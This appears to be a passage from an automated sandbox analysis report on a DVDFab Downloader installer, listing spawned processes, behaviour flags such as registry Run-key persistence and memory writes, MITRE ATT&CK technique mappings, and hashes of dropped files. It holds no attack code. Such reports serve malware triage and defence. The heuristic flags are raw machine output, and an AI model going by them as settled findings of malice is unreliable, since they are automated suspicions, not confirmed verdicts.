        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1980,9086105113024333358,5427706202457223630,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2004 /prefetch:2
        5⤵
        
        PID:2884
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1980,9086105113024333358,5427706202457223630,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:3
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3256
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1980,9086105113024333358,5427706202457223630,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2944 /prefetch:8
        5⤵
        
        PID:3516
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,9086105113024333358,5427706202457223630,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:1
        5⤵
        
        PID:6200
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,9086105113024333358,5427706202457223630,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1
        5⤵
        
        PID:6168
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,9086105113024333358,5427706202457223630,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1
        5⤵
        
        PID:540
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1980,9086105113024333358,5427706202457223630,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6292 /prefetch:8
        5⤵
        
        PID:6900
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1980,9086105113024333358,5427706202457223630,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6292 /prefetch:8
        5⤵
        
        PID:6904
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,9086105113024333358,5427706202457223630,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4104 /prefetch:1
        5⤵
        
        PID:6208
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,9086105113024333358,5427706202457223630,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5244 /prefetch:1
        5⤵
        
        PID:6224
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,9086105113024333358,5427706202457223630,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6004 /prefetch:1
        5⤵
        
        PID:5848
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,9086105113024333358,5427706202457223630,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:1
        5⤵
        
        PID:5896
  - - C:\Program Files (x86)\DVDFab Downloader\DVDFab Downloader.exe
      "C:\Program Files (x86)\DVDFab Downloader\DVDFab Downloader.exe" /install /add_plan /ID:2bcabe577ad22e751a998b7955129e57 /new
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Suspicious behavior: AddClipboardFormatListener
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:6836
    - - C:\Windows\SysWOW64\TASKKILL.exe
        
        TASKKILL /IM YoutubeToMP3Service.exe /F
        5⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:7148
    - - C:\Windows\SysWOW64\TASKKILL.exe
        
        TASKKILL /IM YoutubeToMP3Service.exe /F
        5⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5680
    - - C:\Windows\SysWOW64\TASKKILL.exe
        
        TASKKILL /IM YoutubeToMP3Process.exe /F
        5⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5720
    - - C:\Windows\SysWOW64\TASKKILL.exe
        
        TASKKILL /IM YoutubeToMP3Process.exe /F
        5⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5880

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3868

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5504

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\DVDFab Downloader\CrashRpt.dll

Filesize
279KB

MD5
5c43fa1843c64023b2b6bc34eff8ef31

SHA1
630fdf49dce88eeadc9b62127a42ef32440785c8

SHA256
4292056a677250932383a31967c7dea06404b499e8007bb7bdd473e649921112

SHA512
955b503f987a19e89b6dcc379b613afe599b734227844a227f8614745bcd8e888e8d63e8d5ac87ab1615150edaee8de6200df593882ad8e7de0d4586a18ad17f

Download Submit
C:\Program Files (x86)\DVDFab Downloader\DVDFab Downloader.exe

Filesize
11.1MB

MD5
c86c113ca9c5df6b5167d7db7611a293

SHA1
368033b0bebd93d865cc5d4131fc78934f37c692

SHA256
d304385efb9d1eed18b49cc836c56c06c5fcbc1161bbf98133d10767985d82e3

SHA512
82522b1ebe6f4ea018fb27985560361181063a300402fadf6616bc3432ed7cb4bcf922ec0dbf5a6065c8075b35dd3eb751b433851014109a5da86ae9c0ba91dc

Download Submit
C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\site-packages\pip-20.1.1.dist-info\top_level.txt

Filesize
5B

MD5
00305bc1fb89e33403a168e6e3e2ec08

SHA1
a39ca102f6b0e1129e63235bcb0ad802a5572195

SHA256
0b77bdb04e0461147a7c783c200bc11a6591886e59e2509f5d7f6cb7179d01ab

SHA512
db43b091f60de7f8c983f5fc4009db89673215ccd20fd8b2ced4983365a74b36ac371e2e85397cac915c021377e26f2c4290915ea96f9e522e341e512c0fc169

Download Submit
C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\site-packages\pip\_vendor\chardet\cli\__init__.py

Filesize
2B

MD5
81051bcc2cf1bedf378224b0a93e2877

SHA1
ba8ab5a0280b953aa97435ff8946cbcbb2755a27

SHA256
7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6

SHA512
1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d

Download Submit
C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\site-packages\six-1.15.0.dist-info\WHEEL

Filesize
116B

MD5
03651a952a4bd2c51d18bf254403a443

SHA1
0929d52e0e83031940db0cdf5ce9fda37c6749e5

SHA256
e93dd36191386058b61d34b505e647357022f0de763994f83be749ebea267bfe

SHA512
366562571ee6c63e79bbb07674dea6665da4910996611d97f122b10b231868c348f5c556b0d9175beeb461d4eac0770efedeefad57e7040400e5d3d60127945b

Download Submit
C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\test\cjkencodings\shift_jis-utf8.txt

Filesize
1KB

MD5
b78c31d234a2c8445cb670a78358d2a8

SHA1
f765a69964677d5ef451254e23a779253b774cdb

SHA256
cfbc5299faf453eb4530a8f8133fb48f20012d8849120db3936e92fee97a16aa

SHA512
e608c9ec39f467f6f5943853c449c6dda28e3670f88db4255e664092f84938a353e1d619c893e479765aa1b4bcff8628009bf01989702708f917868dd2439f84

Download Submit
C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\test\test_importlib\builtin\__main__.py

Filesize
62B

MD5
47878c074f37661118db4f3525b2b6cb

SHA1
9671e2ef6e3d9fa96e7450bcee03300f8d395533

SHA256
b4dc0b48d375647bcfab52d235abf7968daf57b6bbdf325766f31ce7752d7216

SHA512
13c626ada191848c31321c74eb7f0f1fde5445a82d34282d69e2b086ba6b539d8632c82bba61ff52185f75fec2514dad66139309835e53f5b09a3c5a2ebecff5

Download Submit
C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Lib\test\test_importlib\frozen\__init__.py

Filesize
147B

MD5
c3239b95575b0ad63408b8e633f9334d

SHA1
7dbb42dfa3ca934fb86b8e0e2268b6b793cbccdc

SHA256
6546a8ef1019da695edeca7c68103a1a8e746d88b89faf7d5297a60753fd1225

SHA512
5685131ad55f43ab73afccbef69652d03bb64e6135beb476bc987f316afe0198157507203b9846728bc7ea25bc88f040e7d2cb557c9480bac72f519d6ba90b25

Download Submit
C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Scripts\easy_install.exe

Filesize
94KB

MD5
c9d933a7c07e254130aba0bbd7bf6f61

SHA1
18508ada42af5675f661cdade10dfe0a3cf6f3df

SHA256
d9b1a3d1a33967f308ecbe36f8e8832aef354474e14943e9d3fd121ffda494df

SHA512
4f7719bfdb114f8aa6ead14d2ae22ce3ab4bd3c02ce522e81879771b0d34be92dfaf7ced2e1de9a659d6721e11ec049a8c5318c6cd99803e1d6a6b70be1089f0

Download Submit
C:\Program Files (x86)\DVDFab Downloader\PYthon37-32\Tools\pynche\__init__.py

Filesize
48B

MD5
3d02598f327c3159a8be45fd28daac9b

SHA1
78bd4ccb31f7984b68a96a9f2d0d78c27857b091

SHA256
b36ae7da13e8cafa693b64b57c6afc4511da2f9bbc10d0ac03667fca0f288214

SHA512
c59c5b77a0cf85bb9fbf46f9541c399a9f739f84828c311ced6e270854ecce86d266e4c8d5aa07897b48ce995c3da29fea994e8cd017d48e5a4fab7a6b65e903

Download Submit
C:\Program Files (x86)\DVDFab Downloader\QLanguage\ReportQt_ROM.qm

Filesize
14KB

MD5
b7b73048941afaab96363699f020cda9

SHA1
52b0939b66b79d8fbd6b449cea6a2a4e741fa77a

SHA256
24fe0b52797139431b7035d6f5e6e2e7a24959180a33db567173309df127e366

SHA512
d01e7e31bbaf9c5c60b2986e0b7f4be6592fb06d6d9969726cee5fb01cce7c84b61b51b533ad3f44b0a9de543304f8f25a488e2e050f52f5a502f931e7ac8a8b

Download Submit
C:\Program Files (x86)\DVDFab Downloader\Qt5Core.dll

Filesize
4.9MB

MD5
98c0e98be71aec6733f014b938991bd2

SHA1
93fa97561542d2ce05c52dcbe1a5121e4b49c86e

SHA256
ccbe74cf22c52781dbe36a29db6c6393c33c645227d746d4fe4ef648580455ac

SHA512
3c951a2f64a968c36da627cbfc3334d8a1c446769a9113d81469706edef99a0c36e0e037f13a6a5f5199738fd33562560449a0481a41617bea897825437ba08d

Download Submit
C:\Program Files (x86)\DVDFab Downloader\Qt5Gui.dll

Filesize
5.1MB

MD5
d3e21d1e5026bd339e779ee25fe72f7d

SHA1
b34f5f700de519bfcca0064364d766773d7ffe61

SHA256
9f51d202d77c322e13b6a49ddf663be8ceee659167743af87eece3442d47e818

SHA512
90c5dd952bf05fbb5e4b078348017476d833ebb871f935b9c13f7ec2c8d11060eeff33745610ac150ff86b592b87e81f469d69ccec0698d9336c85cf6679b0a7

Download Submit
C:\Program Files (x86)\DVDFab Downloader\Qt5Network.dll

Filesize
1.0MB

MD5
ca4d919105dd3e2f3c34d4c0306d7a59

SHA1
9a99c96f2c61835c0d6f93e000f3a6e186e17152

SHA256
663178951fc5116077055e3e5431f0b2a60e7213cefc078efcfa309fd0425e04

SHA512
cdbb81e6fc6122d5ded6efd6cba94b0d17f4bea209139455ddd712af194a1d4a8bcf9669209a86e2f1bf4afba4b821d0ba23c1a3f0dae41493ae96c9bbd954fd

Download Submit
C:\Program Files (x86)\DVDFab Downloader\Qt5Widgets.dll

Filesize
4.3MB

MD5
1487cd890a497f9f98243d86774f4dff

SHA1
fe0468501afdc7d294fea3c156dc6f2b5f48cb49

SHA256
c1ae2210a17fa2aefb879404a6eb26a307495bf578c1a49387be44a2036a2384

SHA512
4071645abcedff1452726dd75fceedf177948f3cd17f9268605dca53ed5bf4f085fe154f41e0420b83ff7c59817e193f8733eeee01d8dc9405a15c5998a4a2a9

Download Submit
C:\Program Files (x86)\DVDFab Downloader\QtQuick\Controls.2\designer\SwipeDelegateSpecifics.qml

Filesize
2KB

MD5
df7e32b0e18bd35fa8453cb1263886b9

SHA1
f4336c9380a7fbee4dfbc17c545b409364f7f8b3

SHA256
8207c603c9de51d9954302dd9df559a1df70e0a9658af62637229b5a2437eec3

SHA512
21d4e9b1d71c5ea9c7c66e5bacead5d4857ac109f7452d81c6d793f8843dd1d6f9194011e41259cdb9e3faecc04675a1433a2dfcbf0b758ff97cbd068fd95732

Download Submit
C:\Program Files (x86)\DVDFab Downloader\QtQuick\Controls.2\designer\TabButtonSpecifics.qml

Filesize
2KB

MD5
95806d0bfadf617cdb91b9baacab5429

SHA1
2102999ec25be88f138ea7c8fbf2a1bf4454c766

SHA256
07911dff4b3128de29fb83223a78878f9e972f35a596429861c7ea7956923b2d

SHA512
00d3b1dd1d764859249a5997ec4b2ec68fdf7c245a3ad4276a81370b2f43090f41d32de48d94307703436e661ebaf64ff96332f109b0e611b74521f28c8f8004

Download Submit
C:\Program Files (x86)\DVDFab Downloader\VMProtectSDK32.dll

Filesize
68KB

MD5
1924db6d1e23f11e3067f76b9f10416a

SHA1
fbc397f52953921b2b05968e1dd343892c30b7a4

SHA256
934c029e4680044f6f8b52402382da8c832e30001593a772e9429af24b787daa

SHA512
af9642a2be644ebed232ed9100e87893c1057e5fe6900777e8c37f52bd93672814b7df22f64352fff455f20d2f2f6acb817e82981025ba562d6cfe25396ae1d0

Download Submit
C:\Program Files (x86)\DVDFab Downloader\cdm\manifest.json

Filesize
536B

MD5
a27046cecd182913c58d81e6499212fd

SHA1
aab828f57180c13cca7c0c6dd22ff9840014d983

SHA256
13468b020bad14c7a67597cf2c3ce00c18107338edd54cebed307a172c0acdac

SHA512
becd8204ef58adadf4ae8829d7986c53e3b47cb6c8717e4fd2ac94982f112def4e304247454311225fe4cdc852fb4aca7c7e45b7f3ffeb387833b1b2c83eda84

Download Submit
C:\Program Files (x86)\DVDFab Downloader\cdm\widevinecdm\4.10.1610.0\widevinecdm.dll

Filesize
8.9MB

MD5
191d5eda948b8c8a65b96d99d08549b3

SHA1
1162c290b284836d4865a6a5aad8c01daccaf967

SHA256
fba305625b0eaa74a82c5f78818b60044842566d509c9f6cef262625e05e6dd2

SHA512
b9b7d0fcb00fe10c98e55c2065b89f374738867cc6ac9cacdcbaac61de5397ffe53b820331082ce8e1d164392b485efe7e2eab4ceb3e768277052e078ac77ba5

Download Submit
C:\Program Files (x86)\DVDFab Downloader\chrome_elf.dll

Filesize
822KB

MD5
06701905cfffd3facb908a53e5d7478b

SHA1
387ef47bb74556ba25e96e1fd77aa93ed27d78fe

SHA256
665c8c67c6911a362266b462e2a12dc7661c812dd54bda08ef764ca57b57d950

SHA512
8391198a204a7ed2bdae1e5ab65d755317f17061c0993d3e5319cafc4fa86e3c0dfeae869305a63b4f4c0d3431dd2e5c6cf70a573504d3681e30cd1674741c10

Download Submit
C:\Program Files (x86)\DVDFab Downloader\com.dvdfab.downloader.firefox.json

Filesize
249B

MD5
156dfb692c0c8fdf9b9037ee214f48c4

SHA1
94ac89cc3a9fc8870977f1019fb71bb89e942ce7

SHA256
5b7aa6894e6ab7adc42ee203a5526ba59fa11a07700ae32a5ca8a34ea7e35e98

SHA512
d58ff18daaeda6b62351bc37571c1a225c4cf868b0cad2eb6cf652e15ac3a833967f22713b8f5917f8f90aacd1461f639b6c03dd28ab4f31d9610a5a09b647c9

Download Submit
C:\Program Files (x86)\DVDFab Downloader\com.dvdfab.downloader.json

Filesize
352B

MD5
dd4ea114cceaba22fd4f9cac7cc276af

SHA1
60f00d6592ead87954476eabf9d5600225c4374c

SHA256
f4b46509e859e759dc6618ab984d04ea1c4f4c970e4ae79448fd454620e9ba6a

SHA512
877d36c1270584464250b957bf0f6d64f023f9a59e6ceae710557205932cd889e36fffc3cd99a8b08616b5abe6029a1a2ece0fe10dbafab4f96e15cddfeb932b

Download Submit
C:\Program Files (x86)\DVDFab Downloader\dbghelp.dll

Filesize
1.0MB

MD5
84ee40783263644246606631870d8062

SHA1
dca78d1af64240ff47496498236b6782d0a43789

SHA256
7df81ec9897c8e828a16371dcbf55659a464ba308f50112921a893bb1106be42

SHA512
cc2d5ccb3c1a8e4ae1a413d4363a00694456ca566fd2b89a5fa297d2f2e1be385022c5aa56fcbd2563420097d627511c5e3c2e54bb06b4085fa43e7c8b44ee5d

Download Submit
C:\Program Files (x86)\DVDFab Downloader\libcurl.dll

Filesize
356KB

MD5
c923cf0e7aa9ffbe9d55bbaee5029b35

SHA1
53cd6c92ebbbf7a28f5407bae95091b570793ca4

SHA256
a5767d7c3e22d9f7ba315627008dffdd38629e00d9407a8be4262f9bcf8d1258

SHA512
d0fd362df539ae9ef1af1510596cbe3ec43b9d2273eeb1014852b9a68d681ee056027968881587c44746f6bfc7500b24f5fb01e6a233bfc3ab8b4b7a23f192d4

Download Submit
C:\Program Files (x86)\DVDFab Downloader\libeay32.dll

Filesize
1.2MB

MD5
67fdf922a35b3ec0b607f87985926730

SHA1
3667ceddd985f7d720108276038666c619ee219a

SHA256
773468cb5e1dfdcb70974b2537170871e6a31379323cab8a8be68d1b14ca10b0

SHA512
169822be70705cef14c13cc279e3e5993b6da9cea01604032074bd58803acd5aa4ab359fbb40613c7919e3f7c4a229f23ff49d2a7ad76f78100b6d6714edfb2a

Download Submit
C:\Program Files (x86)\DVDFab Downloader\msvcp140.dll

Filesize
439KB

MD5
ae1ca6f2ff8f0824e7bde921265c3e89

SHA1
1d054b34665fba895a4612ae141cee5f994a40d5

SHA256
4518d0b0d11c462fcc97156bfab338512c5c4a0da17db032cb365b2fc74448f2

SHA512
976277d328e3032b08e068e39b64be1ec7fd1566979f6eead138a07b6b2dab7652f09fe5171ada107f56b9ed841dcc5aa61ac9a0b08b7e753bf6397d13976805

Download Submit
C:\Program Files (x86)\DVDFab Downloader\my_resource\website_home\css\style.css

Filesize
6KB

MD5
7ad2c65254f2500ea603c80c1f33073b

SHA1
f909769560863139b367cb73757dea2a629702f1

SHA256
cf620efb75ea748796708935e81bb0fb898ead3414bdf86ff1ef26403d10e2af

SHA512
33cd606c4045a3767384b9cedc8c7f945dcc9e9c4a7a4930dc4bcb0826242b880d925e2e2a7e9cc1dece0a98c3a1964e61f80fc852ada69b47fe36278fc1fdab

Download Submit
C:\Program Files (x86)\DVDFab Downloader\my_resource\website_home\imgs\audible.png

Filesize
731B

MD5
5471bf64c701620f6338cb53fcbedcd9

SHA1
192b9327fc7616b97be17844be9e7ddb336042af

SHA256
d55ee31c9a022421bd6f0427d150dc94cdaa28d43c077b93fd870064046020dc

SHA512
e7c794d0556d9cb9e991702336f9116bfe879288c0a62efe7e748c1c843ed3b90a4f35483bfc5d39d394ec0d600cb43eaee2a7dc48a02b073ecf7abd0855021a

Download Submit
C:\Program Files (x86)\DVDFab Downloader\my_resource\website_home\imgs\bbc.png

Filesize
503B

MD5
cefcce763d93d9fcade42c0eb7644498

SHA1
050a96ecdeb8cb8a5dede1126b67f1976476e8da

SHA256
218eb71f8a4b6cd56cc33b4d76fac9ec694ee78cf4a05ce01a73e92895f0b967

SHA512
6a564cdc758127a7b0426bd88c6ce97f1350fefcc70425b3b642ff4db9a7f8570c177fe24f158309304a13af8246a07ed972a3d0c8b9e7b90930caa180acc60a

Download Submit
C:\Program Files (x86)\DVDFab Downloader\my_resource\website_home\imgs\facebook.png

Filesize
347B

MD5
1b2821fff281e9491c0206f40ffc24e6

SHA1
f940aeaaad604bd72df26b4ddeadfd8801c4f075

SHA256
77e7f26fb48321505ca37e925e0586da2bbcc813f1373f2116f0eb0f2aa2375f

SHA512
e925fdf30752927e769271a9c7431fb06d26b1ee2030d4fb3ec49f134c571a85ed084a132852e5065de7fd5a28ab96eac2d973a7151e10da5e3e6a151b0dccb1

Download Submit
C:\Program Files (x86)\DVDFab Downloader\my_resource\website_home\imgs\icon.png

Filesize
3KB

MD5
5ab70ddc4c532aa9286904a2c345e7dc

SHA1
6235fb0f399103f9c885ca741d76d5e26db9d79c

SHA256
33ca4eda1389b09205b624903e86a207dc58133d10a7ba0bbb7a4ba812002eff

SHA512
70256a8cc6cb0283c252ebc2e6e4c4b2291065dacf38f30b7856ddfc18cefcbc0f2c1a4c65f69db1ef79ac5ab55351d8fa3cf589db15e8d97621a4711fde446b

Download Submit
C:\Program Files (x86)\DVDFab Downloader\my_resource\website_home\imgs\instragram.png

Filesize
1KB

MD5
c87d815898e27e13f81b5eda1dfb9aa8

SHA1
762be0e8cfffef311f2b67e8d12b80983ffaf410

SHA256
737e935ed5f0377a57d3c8134193c44e7399275f5e18f84b2cb073830f0c6b10

SHA512
6087e6f8d23f264553b51dad0d1c0402b96d5c08a285f891d67c4e519bedebaacf8ad6ad836118968a22edbedc1c94ea1a9fe178847c01c8e1a14ff3eba3d0a5

Download Submit
C:\Program Files (x86)\DVDFab Downloader\my_resource\website_home\imgs\music_youtube.png

Filesize
665B

MD5
926a08099974a4e5c9168f15e2e72221

SHA1
33f3b18ae6c64f45ae7a88b10a735a25cb9c584f

SHA256
fddc58b4924322f9ef0068b6a0f80bac1e1341bc4ffdc44029c8d5fb77fd5827

SHA512
bcf21e564b8479877124d562d63a308fffec567db01e3bc995299bf7426953851e0a78bafb6d56fd999140c5f7b0c5e62e26447d2d0b12a879f40ed34b235f5f

Download Submit
C:\Program Files (x86)\DVDFab Downloader\my_resource\website_home\imgs\twitter.png

Filesize
544B

MD5
215aa704f0832828172a52586b74a045

SHA1
c31ce4e7f0a3c7cd219077c2f0a3d386a439b7b1

SHA256
2b3e237bcca77ecb7e7d4c60de440597db8c6923f063c4a2bddd61e22f782b5f

SHA512
d8fa6fd35f62e7269be9e68a36540b4663c13d670a3a71e6251b6f4fe9ccababe4e6938a9054194a4f3261e1cc6a0eca26024094675bed768d67da128c690cb8

Download Submit
C:\Program Files (x86)\DVDFab Downloader\platforms\qminimal.dll

Filesize
680KB

MD5
e0058f66e2961f778c68261e2c459e91

SHA1
4eb3d152966a16ea1abc7a9626058f7e4345fb5b

SHA256
c83c66b05aba6ea4a867e42988f7b8ae168682cdba53e714d687f1ec75283189

SHA512
6187b20a329300c1ed72366d0e0d50dd457e1c8c08c8394c07ecfb007fb2358af486341443933b5f58cc2b2bc2e6ac23f64aed843bd1c8a9604de619d471b96e

Download Submit
C:\Program Files (x86)\DVDFab Downloader\platforms\qoffscreen.dll

Filesize
604KB

MD5
cfbaec7844ef5939e26f843607ad0f9f

SHA1
ee47fb1c1e4cb355634f6ff5ea9233b0b7f0c464

SHA256
3bbc4b9ec7a00ffec8dab23e8680a70fbaa4aa0cdf4f1ab3b8ad4be744f88596

SHA512
e0dce922440cd61e7a6d273929626500e7a22ec296f711d5f1e852adccbd1cfc16f29d66f3c6353341a5ab8a7b52cfa7093fade2d7b00b52799cd83fe0e86bc4

Download Submit
C:\Program Files (x86)\DVDFab Downloader\platforms\qwebgl.dll

Filesize
546KB

MD5
b0ea0eefd186e6a6ce060f9316038972

SHA1
c36daf29accff2a32f92f0e098d55a3af744e8bc

SHA256
9a964f47507f1939a655874a388ae36ebaa6dc95df7237e8ba43c6a48db7e61f

SHA512
66fa1fbaec8b6ccf2909591bc659fd41155fc1a7d1edb3415401f4a63fa66105d381a854551caed28e5b585bd216b1dbe9943b96c1c55cc6f70904e65784b58e

Download Submit
C:\Program Files (x86)\DVDFab Downloader\platforms\qwindows.dll

Filesize
1.2MB

MD5
d4dbe5bba78f6eb9783b211ca8a6e09c

SHA1
c01badcfac49fcede2d29c32ff21b08271ec5b65

SHA256
9fb913481f8a7b2fba4760ff38d4a1ebacc3fe7955fcb81d6f41f2903bfe8ff9

SHA512
b4b88f24ba3e0e6ce4c4d0e50363d3c049c284f5b346c69885ae812bea942c9ca8703d1e55408b9480db128c3d72d407cd6ad3efbbfc95701cc82f476f400657

Download Submit
C:\Program Files (x86)\DVDFab Downloader\ssleay32.dll

Filesize
283KB

MD5
4957c6ebb460c858d9babf03b0f07225

SHA1
9181ab81ff0ba4c913794f0c17fc60698fbb9e11

SHA256
d5d801525b0a0d4ea8ef9b03b35d40e900aa99c1827c51c69972f3c22b973465

SHA512
9739cfe29b18387693e7533d8f338b0bb36c9e117faddf6f6e2fdcc155beb0af7465c1ec628d25852c861167272dc9a8d4c288a89bb782040917845911f7e630

Download Submit
C:\Program Files (x86)\DVDFab Downloader\styles\qwindowsvistastyle.dll

Filesize
125KB

MD5
092089e39f2743d38eeb594903bebe77

SHA1
e0d4af37cd50e2f263af7b5a4aee5cf03494ee31

SHA256
406364064d82ec2773f6d48cbe7250d72e8407265e2a2fb50d4be6ad792a868a

SHA512
4620082bd921f3549bb64af5a03a9f90106f753e640ba8d712ed2fc4d907c1155c077ea960b40ec18fc6ae70faa9d45f2db913669a9c4dead3ab059f2d291570

Download Submit
C:\Program Files (x86)\DVDFab Downloader\styles\qwindowsvistastyled.dll

Filesize
302KB

MD5
2d25ad7b99a982cbea55f2d05f9e6630

SHA1
d178209a43b506cbcbf62d13e2d9cd82da9a38d4

SHA256
b4d9f963c7887a761514c1f5857c139e5fbc49af5a8dd3027fddb54735b6bc26

SHA512
1d20054ed243fa6ffe412dde26d1faa8b90665aca490070fb0908b0d62686ec73c29f935fa6272714a827238b2eccf2bd65b55a3f3bded9d738d984cfe4a0e09

Download Submit
C:\Program Files (x86)\DVDFab Downloader\vcruntime140.dll

Filesize
78KB

MD5
a3677cdbe6b4e6d57e2927b53d105ac7

SHA1
b5fc836566ee64df6995bc30ded944fe69f8c243

SHA256
1af1a4dd8a5b5f7b7654cb7044e4acb727568ac26fbb353343e0e670f2610330

SHA512
948588e73d0943aa4c1a6bcb5d39415e30da6337575eee3e1eaf40746c3febacd751f8ef612503f4149fe3bf8662ecbe41196523f172ef7505a846c49beea7cb

Download Submit
C:\Program Files (x86)\DVDFab Downloader\zlib.dll

Filesize
71KB

MD5
248cd42db8ef98adcaf91a60ca3558bf

SHA1
fda5ef90fe575d3a96aa5f4db50940dc6da12552

SHA256
473bd94e83ce765f01e7400ad4c6ba881385d44428729f88aab4f6ee863f78de

SHA512
5a0087effeb79286cc49451b804a537fc566b46d11e0408f424fe148d27f30a2c172317eac4de9771bfe40210f01ec4f01ad5e1a4e454556095dd6a981a17de2

Download Submit
